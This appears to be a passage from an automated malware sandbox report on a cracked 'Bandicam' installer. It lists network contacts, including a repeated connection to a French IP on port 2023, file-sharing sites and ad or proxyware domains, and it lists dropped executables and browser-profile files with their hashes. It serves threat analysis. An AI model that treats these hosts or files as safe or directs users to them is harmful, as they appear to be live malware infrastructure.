| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.100:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| NL | 31.214.157.31:80 | 31.214.157.31 | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.170:993 | imap.gmx.net | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | clients1.google.com | udp |
| GB | 142.250.187.238:443 | clients1.google.com | udp |
| GB | 163.70.151.174:443 | www.instagram.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | cse.google.com | udp |
| US | 8.8.8.8:53 | www.adsensecustomsearchads.com | udp |
| GB | 142.250.187.238:443 | www.adsensecustomsearchads.com | udp |
| GB | 142.250.179.238:443 | cse.google.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.4.4:443 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| GB | 216.58.204.67:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | l.sharethis.com | udp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | udp |
| IE | 52.16.107.53:443 | l.sharethis.com | tcp |
| US | 8.8.8.8:53 | dropmefiles.com | udp |
| RU | 176.99.128.18:443 | dropmefiles.com | tcp |
| RU | 176.99.128.18:443 | dropmefiles.com | tcp |
| RU | 176.99.128.18:443 | dropmefiles.com | tcp |
| RU | 176.99.128.18:443 | dropmefiles.com | tcp |
| RU | 176.99.128.18:443 | dropmefiles.com | tcp |
| US | 8.8.8.8:53 | 18.128.99.176.in-addr.arpa | udp |
| RU | 176.99.128.18:443 | dropmefiles.com | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| RU | 77.88.21.119:443 | mc.yandex.ru | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| BE | 64.233.166.156:443 | stats.g.doubleclick.net | udp |
| GB | 172.217.16.234:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| RU | 176.99.128.18:443 | dropmefiles.com | tcp |
| US | 104.19.168.63:443 | login.ent.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 63.168.19.104.in-addr.arpa | udp |
| US | 104.19.168.63:443 | login.ent.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| RU | 93.158.134.119:443 | mc.yandex.com | tcp |
| US | 104.19.168.63:443 | login.ent.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| IE | 52.16.107.53:443 | l.sharethis.com | tcp |
| US | 8.8.8.8:53 | www.fayloobmennik.vg | udp |
| DE | 88.198.29.97:80 | www.fayloobmennik.vg | tcp |
| US | 8.8.8.8:53 | startpage.vg | udp |
| DE | 168.119.245.137:80 | startpage.vg | tcp |
| DE | 168.119.245.137:80 | startpage.vg | tcp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 104.18.10.207:443 | maxcdn.bootstrapcdn.com | tcp |
| US | 8.8.8.8:53 | code.jquery.com | udp |
| US | 151.101.130.137:443 | code.jquery.com | tcp |
| US | 8.8.8.8:53 | nic.vg | udp |
| US | 8.8.8.8:53 | sylverlight.net | udp |
| US | 8.8.8.8:53 | wixstats.com | udp |
| RO | 185.247.61.225:443 | nic.vg | tcp |
| US | 8.8.8.8:53 | www.bvi.gov.vg | udp |
| US | 8.8.8.8:53 | 97.29.198.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.245.119.168.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.10.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.travelpayouts.com | udp |
| NL | 188.42.198.252:80 | www.travelpayouts.com | tcp |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| NL | 188.42.198.252:80 | www.travelpayouts.com | tcp |
| US | 8.8.8.8:53 | lads.sslparking.com | udp |
| US | 104.18.10.207:443 | maxcdn.bootstrapcdn.com | udp |
| NL | 188.42.198.252:443 | www.travelpayouts.com | tcp |
| NL | 188.42.198.252:443 | www.travelpayouts.com | tcp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | udp |
| US | 104.26.12.250:443 | lads.sslparking.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | 225.61.247.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.198.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.12.26.104.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| RU | 93.158.134.119:443 | mc.yandex.com | tcp |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | oauth.vk.com | udp |
| RU | 95.213.56.1:443 | oauth.vk.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 1.56.213.95.in-addr.arpa | udp |
| US | 104.19.168.63:443 | login.ent.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 104.19.168.63:443 | login.ent.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| FI | 65.108.228.44:443 | transfiles.ru | tcp |
| FI | 65.108.228.44:443 | transfiles.ru | tcp |
| FI | 65.108.228.44:443 | transfiles.ru | tcp |
| FI | 65.108.228.44:443 | transfiles.ru | tcp |
| US | 8.8.8.8:53 | 44.228.108.65.in-addr.arpa | udp |
| GB | 216.58.204.66:443 | googleads4.g.doubleclick.net | udp |
| RU | 77.88.21.119:443 | mc.yandex.com | tcp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| FI | 65.108.228.44:443 | transfiles.ru | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 104.19.168.63:443 | login.ent.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| RU | 93.158.134.119:443 | mc.yandex.com | tcp |
| US | 104.19.168.63:443 | login.ent.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 104.19.168.63:443 | login.ent.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 104.19.168.63:443 | login.ent.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.100:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 104.19.168.63:443 | login.ent.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 104.19.168.63:443 | login.ent.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.100:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 104.21.58.202:443 | api.peer2profit.global | tcp |
| RU | 87.240.139.193:443 | tcp | |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 193.139.240.87.in-addr.arpa | udp |
| RU | 93.158.134.119:443 | mc.yandex.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | greevethul.com | udp |
| US | 8.8.8.8:53 | greevethul.com | udp |
| US | 104.21.1.251:443 | greevethul.com | tcp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | choogeet.net | udp |
| US | 8.8.8.8:53 | choogeet.net | udp |
| NL | 139.45.195.8:443 | my.rtmark.net | tcp |
| NL | 139.45.197.252:443 | choogeet.net | tcp |
| US | 104.21.1.251:443 | greevethul.com | udp |
| NL | 139.45.195.8:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | jouteetu.net | udp |
| US | 8.8.8.8:53 | jouteetu.net | udp |
| NL | 139.45.197.251:443 | jouteetu.net | tcp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| BE | 104.68.85.7:443 | s.click.aliexpress.com | tcp |
| US | 8.8.8.8:53 | best.aliexpress.com | udp |
| US | 8.8.8.8:53 | best.aliexpress.com | udp |
| US | 8.8.8.8:53 | mbest.aliexpress.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
Files
\??\pipe\crashpad_4228_QHIJHBKTMKIURFRX
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 6ee53abe9277e5c74ede069ea4c414c8 |
| SHA1 | 44331c5a71790cfb9aad9e23b6c6afafcacb5d93 |
| SHA256 | 91fbcf32b756e9d9ea836d7d85534d666ab06b67aa230d7af4eefbac31f6e07b |
| SHA512 | c06c9b39b4d9af9f761dfb7789c321092bd954360659d23770ee8cc2351e604df4949e16be01d9d029a584e7013148f0bf39e104dfea64e895fb387dc9a8cd8d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 33523c4c96c1df70d67f54a4b76fc4ac |
| SHA1 | 11fc6e6272afdcf31f486cb4cf4ce09c505aeb87 |
| SHA256 | 905f0c3e2341fc75852b9a0dc4d1cbce1ce2da9140c07dd85190b86a3e995d77 |
| SHA512 | dcfee40eea7d18f6c6366a76234359b05bf8a2f0cf5052c2b79d7fc076fed325f9ccaf17438688ad526a594117cb22df4eeb018acdedebb7848378432b90cc79 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | ea73b70966dba36cf987495e3983c31e |
| SHA1 | 2cd7f7dd7f78621c22a2a2a00df674c359037aba |
| SHA256 | 10655055c4618ebc67ea49ea5c89d87c65b2ba7fea1cfc53f1927735e248f433 |
| SHA512 | 00d13d68a1dd1e9a84e5cf3f8d54027aa5638b6234479f4dd221578c5a0d97e54c9c9b860a78d92801a3b67606fd77881cc013f1e711a325e031eacfad2becde |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 50e126dd3f0952382a6cdd0255f4309f |
| SHA1 | 2bf4fc1b4b48118d6b0906cd9b93c4a882f8fbae |
| SHA256 | d3f80c64e9f2130365a1325a7ad0e0f7e73d4a26daeaf924563f1a68ea08464c |
| SHA512 | c8caf4201d8c41996707d27fe967361eed4bb30ab46dcc67cb087ba708503fc7559b641abfacb64a5c315592b05ac246e085cd19f79e3e6e3039956df72e557c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 6af5a162ce793f9b45e94ffdb7a6ed34 |
| SHA1 | cc7ae166c9b4fd963bea15ed1559ae9ba9b157d1 |
| SHA256 | 5bdf0e938316a7567f11e6f07e2e2db18b8801d402089b5584c1dd15fcb8c6bc |
| SHA512 | 6c920722299baa0e14f705c0145cbb5bd9680b07b0cf5b4f95698d50b661f2a290a245023f0d8d8f1c11a915e3b375cef04395ee98b00adce613f8e7d1b7bf7e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | fc9cac102e03bba9ba0d4170cd3a2bc4 |
| SHA1 | 51fef192d4ac836874eb977bb5ad6632666d9eae |
| SHA256 | 6343be0455fc6142d6a1590a9f0aead7cae2184fee6e9c65820d4e53367bb581 |
| SHA512 | 9136e2d00c6c9a8faadf86782cb5fe8d52a397e439fe63323451c104172eece95cd55a897dd11a06ce9625a8e705917d54f474229edd82382ea7f596927b6982 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe588325.TMP
| MD5 | 167877a9f89196823ca8502351b457c3 |
| SHA1 | 9b6912919725c0696ca19a9e6d6d61f8cae0ca74 |
| SHA256 | 770350b621e9346736d1a9ee54b2479ddfb686b03e8b724111e4f2ac9fc7f2cb |
| SHA512 | 3776c50cf669180f1561fdf004ebbc922bab9fee01cd7742abd769508f511ca5b6200bf1b3a11a5a8a8ce9a9e2532c44b036ec0b62f71fdb9c7d915801b3b959 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 8794e2980a02205e704ea552ab0632da |
| SHA1 | ead500d37a1796d69612571cdc0e1b500f88c844 |
| SHA256 | c2fa9757c31793339b53ff334ea0d3e9e521f9203051ec3e6eb26749a4dc765f |
| SHA512 | 4013db1aac56359c91b2beb97b0208ea0c591735fe9ff0ffb6c9b2d2197c809bdad7a30ce028c5a3f6e7bd4981a42d6a25a665b683718e3bdcec675b557db6d6 |
memory/5652-141-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-EEARP.tmp\Bandicam-Crack-With-_Aba4u2mPXY.tmp
| MD5 | 4a25cb79eff4f80e6f649632b7e72bbd |
| SHA1 | 5c082a7b8ada7b0c166d24cb01bd3edf656cd91e |
| SHA256 | c92620a29cb7e36fcba95d5a0dc894646958eb6ca7a22fe77a9bb44d879385b1 |
| SHA512 | f92f286297433c26a937e85bb071c917f45bdff0a7d432e7ced8d643cf4220aa99b9f5c360f788f939f13c41aed0b58ea63bca68662f605b7dad1c59b91934fc |
C:\Users\Admin\AppData\Local\Temp\is-9BB2H.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\Users\Admin\AppData\Local\Sonata Studio\sonatastudio.exe
| MD5 | 71a435da1198c84051b46087af3f4879 |
| SHA1 | bd1fe081648f4ed2c7e2175dd69de4430b136d5d |
| SHA256 | dafbf8effd3bcc41b133ab69cf3a7e75e39f3969a35506c7378620df8bb7df55 |
| SHA512 | 51e77a916c07b52ebfd89c52c712421f39018f09402e3d90f9084aead447eb365fef2930f521274bb6390443f6a386d3b05691a498e4c0d441e2286524c9c8b7 |
memory/2704-210-0x0000000000400000-0x0000000000D91000-memory.dmp
memory/2704-211-0x0000000000400000-0x0000000000D91000-memory.dmp
memory/5652-213-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2224-214-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2704-215-0x0000000000400000-0x0000000000D91000-memory.dmp
memory/1256-218-0x0000000004560000-0x0000000004596000-memory.dmp
memory/1256-219-0x0000000004C10000-0x0000000005238000-memory.dmp
memory/1256-220-0x0000000004B70000-0x0000000004B92000-memory.dmp
memory/1256-221-0x0000000005470000-0x00000000054D6000-memory.dmp
memory/1256-222-0x00000000054E0000-0x0000000005546000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyxrm2ii.np0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1256-234-0x0000000005650000-0x00000000059A4000-memory.dmp
memory/1256-236-0x0000000005BD0000-0x0000000005C1C000-memory.dmp
memory/1256-235-0x0000000005B10000-0x0000000005B2E000-memory.dmp
memory/1256-257-0x0000000007170000-0x00000000077EA000-memory.dmp
memory/1256-258-0x0000000006020000-0x000000000603A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\X1K6CMDT\yW3xK3wTLI1nF70Y8sUw.exe
| MD5 | c50f1ac510da6e9afcc742c4a5a46588 |
| SHA1 | 375c6d65391dd9083dc3778a8527bcea5b577b84 |
| SHA256 | 482be211629b45eb213e5d10d93ddea46a268212222011eae289a3b0205fff06 |
| SHA512 | 7abf75909af1beb546d68069149280fdcfe85fc74e2edf7016e19d9a9f8859a0db40837d3c7c42d9012eb299411901f06d4b2173d334aef271e45392a179e9db |
C:\Users\Admin\AppData\Local\Temp\is-371K3.tmp\yW3xK3wTLI1nF70Y8sUw.tmp
| MD5 | 47d9bbe70b5142eecee1594b8283ebd6 |
| SHA1 | a23ad785865f2f40d20ff7ccd317e46f7325a104 |
| SHA256 | bbfcaecc64b36dcb118ba9136246dfd943f3b70812c6a949f9b507a46282dbc3 |
| SHA512 | b38d94d48eb44beb404d9a7577a37968bcd181c2855f88e9909d12bdc9891a18f7a6229c588ec508e36ee46b62ebe255f00ba8b8368569acebee29b48ecfc8d0 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | db8e2b634ba3c9f3edfbdf6fc8cb6718 |
| SHA1 | ae658b5cf90586823995d60b5a6eca519afb40f2 |
| SHA256 | ba0862c564e14806e868375a79dc8b6023ccb1cfa685eaa33c611d6b3f45a2f9 |
| SHA512 | fcb6dc82fbb85f4d4b8b366af1319fbb7327d608d2fe27c3b2ddcc6fc56375d09b9086202734bfe6f4d0e8f43622bc2bb9b130ebd768acf0032cf3c1d73aee08 |
C:\Users\Admin\AppData\Local\Temp\is-NQNP9.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/3388-264-0x0000000000400000-0x0000000000414000-memory.dmp
memory/6108-329-0x0000000000400000-0x00000000006B8000-memory.dmp
memory/6108-330-0x0000000000400000-0x00000000006B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\w1diITMZ\ao5WumFEFYqVD7.exe
| MD5 | 801abdda1545c8e6dc4796fdbfab9419 |
| SHA1 | fc83cc2c5bb72618f121bb206104791187d3fb68 |
| SHA256 | 919328ffd781920cac1bee1bc0fbeccd79ed7ca454f81679d58ba509834442d2 |
| SHA512 | 54cc622cf4973f8651beea249cd8dd756eae6105eabd3e4e2d1d308465c8540b2296e7cb735c77302947e6d95a037c6e75ec2eadfe0908a38813989a5b74cf7e |
C:\Users\Admin\AppData\Local\Temp\nsq5D4.tmp\INetC.dll
| MD5 | 92ec4dd8c0ddd8c4305ae1684ab65fb0 |
| SHA1 | d850013d582a62e502942f0dd282cc0c29c4310e |
| SHA256 | 5520208a33e6409c129b4ea1270771f741d95afe5b048c2a1e6a2cc2ad829934 |
| SHA512 | 581351aef694f2489e1a0977ebca55c4d7268ca167127cefb217ed0d2098136c7eb433058469449f75be82b8e5d484c9e7b6cf0b32535063709272d7810ec651 |
memory/6084-368-0x0000000000400000-0x00000000006B8000-memory.dmp
C:\Users\Admin\AppData\Local\Vaer Video Recorder\vaervideorecorder.exe
| MD5 | 284bdea43853dbc5aba5c743134abe97 |
| SHA1 | c704c58f382fbf1c9966c98c721df660f9ba7bdd |
| SHA256 | f7068cb9f1614b9184b89b311186f6168a1f0899c28875aa12f0eaff48e164e9 |
| SHA512 | b6d5e60cb64da2947cc6f32923e5a5d2d00809f1690fd058ce9627d90e1803d0cfee6905f4925572900bc1ef38a52342b16a63b2af41ec1ccc14e8db76427c44 |
C:\Users\Admin\AppData\Local\Temp\nsq5D4.tmp\nsProcess.dll
| MD5 | faa7f034b38e729a983965c04cc70fc1 |
| SHA1 | df8bda55b498976ea47d25d8a77539b049dab55e |
| SHA256 | 579a034ff5ab9b732a318b1636c2902840f604e8e664f5b93c07a99253b3c9cf |
| SHA512 | 7868f9b437fcf829ad993ff57995f58836ad578458994361c72ae1bf1dfb74022f9f9e948b48afd3361ed3426c4f85b4bb0d595e38ee278fee5c4425c4491dbf |
C:\Users\Admin\AppData\Local\Temp\nsq5D4.tmp\blowfish.dll
| MD5 | 5afd4a9b7e69e7c6e312b2ce4040394a |
| SHA1 | fbd07adb3f02f866dc3a327a86b0f319d4a94502 |
| SHA256 | 053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae |
| SHA512 | f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511 |
memory/6108-327-0x0000000000400000-0x00000000006B8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e42ec7db2b72b736a640cae074df0e6d |
| SHA1 | b64f6906ebe4d1313edb316a00bcf59690aece9a |
| SHA256 | 96241210a78902cbba561a9fa8c3273ee00fddb6c0d1341179076023abef5b69 |
| SHA512 | c375133434c46755b6dd56fe3642a7e29f65dc4f564854b02b5f8eb004f2ba1c55af5a68b0b408f03bab98737276662f05f4f3c66162e47b213c78471e0bdda1 |
C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe
| MD5 | 76e0d21334f946b3222e06f9402ced80 |
| SHA1 | 0c48c8b3ef62a4219008790b309a49e771dd1a14 |
| SHA256 | 6c78ceaeb7d9d29a80f829ea8aa79ecaffcbe6606958d06b99b109d96b8ae97b |
| SHA512 | 4e3c1cfe58bbfacfb537d58cfab17cfe26fff1f7e2421923bb441448cbf3f34c2d681297cbf4e86de5710b1dbc5278d1c154c863d312fc886a3cb8f2c2de2da7 |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2405250106344572736.dll
| MD5 | 262914d097073180581a34ed92240c0f |
| SHA1 | 09d3d5afa35025ff3fdf5659d2fcd46135c73d4f |
| SHA256 | 3b2e9082e990e72f21ccb4583c95cdc323d3c3e703026beb293d9c5b0a7e81de |
| SHA512 | 43c389938297bd7054904c9cc886eeb6235c688e8861e6dd48ad60cc0f2cfcfdfd46c6069ff98f1c772e17d63872323671071fd11ac097325404dcfd69556fd2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | bb7a8ffed4852a1f4ab7942b4372e054 |
| SHA1 | 18731b92df7c9bb88d525fb5a1dfaa5d4ae8c340 |
| SHA256 | 02a6faa9e0ef6f2f09a756fb0d660817b1efa46c2ad8d0c735f213912a5948a5 |
| SHA512 | 2f461935443eeaf9728573f3bb033e6a0aeeb76300d8756cffef8e1a573c7741da2f81fe4bde8d0825d77bdff8d338d027bf75ef7578f043991973f17b8d3f10 |
memory/5948-411-0x0000000005CE0000-0x0000000006034000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | a12569cb0492557c7afd37ed2604e61b |
| SHA1 | f8600ec8db84e0f88d58c051a0b46fe88208532c |
| SHA256 | 0e5c82f7c2781277df63ec635a51466b501c844df2397a55dc33b117c4974a56 |
| SHA512 | 5c98368fd7fc6b9e72631e65fb7c60bc2ea63dd22c2e475e448cde6cc10d5c8af58b6f9e0718df74f79f2f0d84e7912dda2b463f49c30ea575aef7007d184527 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | aa85200ba4952a0cc51ec35ef4fb094c |
| SHA1 | ee372bf706baedc2c36bb3df58e9f68578c65d4d |
| SHA256 | 6c46d33f0d0bf509004f5b5608fd60adc04f690b817a60b38d7a3991997a403a |
| SHA512 | 0873af5f3dc4d21b1c611c964412da8752d1857c9f6bc081cad3bf4eda86806fe55eb62cabc44267c22c81ffc04eb45dc72137c63d213e42289dbfc2a94cfba9 |
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | 70c4561a430633506c05b32490b7f032 |
| SHA1 | 5b2133db7bec71554e55744da4b7f81ddefbc90c |
| SHA256 | 59f4979f5eee3493ff54085b8bad55419ef155193ccde087f477e2c6b1e0987d |
| SHA512 | fb0883d143e4c35c7a70a14c90d97a77e06b0a70d6b3a02ef25f20cfe1fbe547d13965da664aebb56f225e6e89fda5149d859dba59d8fef4b4fa99bd234c3e3d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a5498ec6-269d-44e3-a4cb-a061f13a2cc4.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
